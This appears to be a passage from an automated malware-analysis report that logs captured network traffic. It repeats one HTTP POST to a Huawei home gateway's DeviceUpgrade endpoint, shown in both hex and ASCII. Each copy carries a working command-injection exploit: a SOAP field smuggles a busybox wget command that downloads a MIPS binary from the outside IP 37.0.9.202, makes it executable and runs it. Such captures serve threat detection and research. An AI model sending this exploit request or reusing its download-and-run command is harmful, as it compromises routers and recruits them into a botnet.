64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
